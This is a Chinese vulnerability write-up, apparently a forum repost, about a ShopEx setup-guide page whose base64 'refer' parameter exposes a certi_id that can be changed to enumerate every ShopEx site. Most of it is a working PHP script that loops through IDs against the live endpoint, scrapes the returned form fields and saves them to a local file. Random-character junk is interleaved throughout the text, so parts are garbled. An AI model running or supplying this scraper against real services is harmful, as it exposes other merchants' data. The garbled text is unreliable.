|
简要描述:2 n; q3 l$ I+ J' ~- p/ _& }# w
ShopEx某接口缺陷,可遍历所有网站
- a- E$ Z5 j9 S8 z2 H1 g0 @详细说明:
) u" K! r/ M3 t! P/ f! W问题出现在shopex 网店使用向导页面 ; ^9 {4 Y, f1 `' [& _
5 s) F5 Q8 ?3 U# q( Q% ^. U+ e( L+ r' q6 @8 g7 \- w7 w
# I9 }, o- H3 b+ t% t( ghttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0= n& `: d- r4 U n! @2 E2 e a8 a
0 Y6 E7 t" l D+ K) ~# c* }
9 A& k' O' T; L! {. p" P M% N0 X7 o6 {# e' i
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}& K9 t/ U6 @4 W' d5 ^1 N; h
% }0 {4 q' }# ?7 y
3 l: k1 m6 k3 C1 J4 X" U8 _, ^* X( P$ R. [
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 7 i, |# m$ {- o( ]' R% R
0 B% W: N4 v& K1 Z) `
! r* j! E6 @ j% x- A F: N2 B
% Q. m2 K2 R" U
<?php
/ u: }% g1 v* ?; o. Y
- p, G$ m5 \2 `- Z# q for ($i=1; $i < 10000; $i++) { //遍历
|. o+ r7 ?& v0 B
: P6 @5 s) T! [$ G ShowshopExD($i);3 o, s; b6 U" G; N, e! i2 {4 |( F
% e' a( S. ]5 u }
1 p" G J" W6 F
2 S$ `& u+ v* b% s. A, U0 g0 n function ShowshopExD($cid) {
6 \" m) B; Q; o3 s% [( h3 _3 x1 i. S
/ T+ f! ?; ]1 m# m% X+ \; N $url='http://guide.ecos.shopex.cn/step2.php';
: B3 a/ K$ w, n4 K
& K. z- P) r# P $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');/ ]5 Y" B/ y" [6 m" T) _
/ D4 o4 s( E3 \- W3 X( A* v $url = $url.'?refer='.$refer;( P6 l- A7 G U
+ O% X& ~2 g& w
$ch = curl_init($url);
' R, p4 F; w# W d% e8 Z$ l1 f |" g6 U& n
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 k* f2 p$ k6 g( |) c$ J
* ]4 \, s1 `, Y: h: s# `, R curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
9 T8 |3 z7 ~6 I: V) b+ a3 N% E2 L/ R/ s' E7 a% B- }7 p
$result = curl_exec($ch);% q& ~& M( m: {8 c# I. b! ~
6 L3 E& g2 b( g) M `. V8 x $result = mb_convert_encoding($result, "gb2312", "UTF-8");: m# c) E+ [- O j. b: S8 _
9 k& n8 \+ g2 C if(strpos($result,$refer))
+ m6 ~! H" z j8 u2 q, ~6 N* M) }5 k% }/ G/ b5 [: _+ K# W
{2 R( M! t2 {! } ?
, q# |& s2 p: j* N- h( L' O2 Q $fp = fopen("c:/shopEx.txt",'ab'); //保存文件' n/ T- q# F6 U9 P3 B
5 G( x" c w. H6 g2 p
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);4 `0 m9 Q. F2 a! D+ B: L4 [
4 M. }7 g* N/ \4 `' x
foreach ($value[1] as $key) {% k& H1 I6 H0 q& J6 Q6 u6 X+ U! s
+ V* k' J' W9 c- h* Z6 [7 ]( ^7 w7 s
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);# k2 L% ~/ P; _
" l1 }* U2 j% X. P% u O echo $res[1][0].':'.$res[3][0]."\r\n";
( _. t |) \' j4 x5 {6 r! [
- t4 D C9 e) X: w1 O $col =$res[1][0].':'.$res[3][0]."\r\n";
# {. e* ~1 r# @ i
. i7 h* S/ ?4 P( {! }* A! l fwrite($fp, $col, strlen($col));
. f& E8 d: Q, y( f' D: ?9 ?: ^8 U# G, H; M
}- ?$ I) @. t. B- g
7 s0 s. l" i' W& h9 [
echo '--------------------------------'."\r\n";: }3 ~8 i9 A+ H& Q
; y( v9 b: K$ x( l# P8 Z fclose($fp); # x5 f. l+ ?& G' H9 V/ b' f \' X
: A& p( h8 c2 ` }2 F, S N" I& n
# _3 w# t! j" m) j! Z% t/ }6 e2 ]# O flush();
2 Z4 i* W7 Q% x. X+ w* A
; N y: V k, `: n% M+ B curl_close($ch);
% E" u" b2 D9 m3 Q. s" t i# r3 Y5 h% `2 S; V$ c
}. X6 D1 x" M. K/ H1 E0 a1 O A( s
4 Y' j8 t u3 U8 ?& q5 G1 H' q
?>
q' ^" e2 p C. x" F5 o- v漏洞证明:
# V' q4 A: M) N, }( s( U% qhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
) X' p4 R3 D4 V* _! q5 U) J& D4 Zrefer换成其他加密方式
" l- `' H+ a8 s1 ?+ B4 d |
|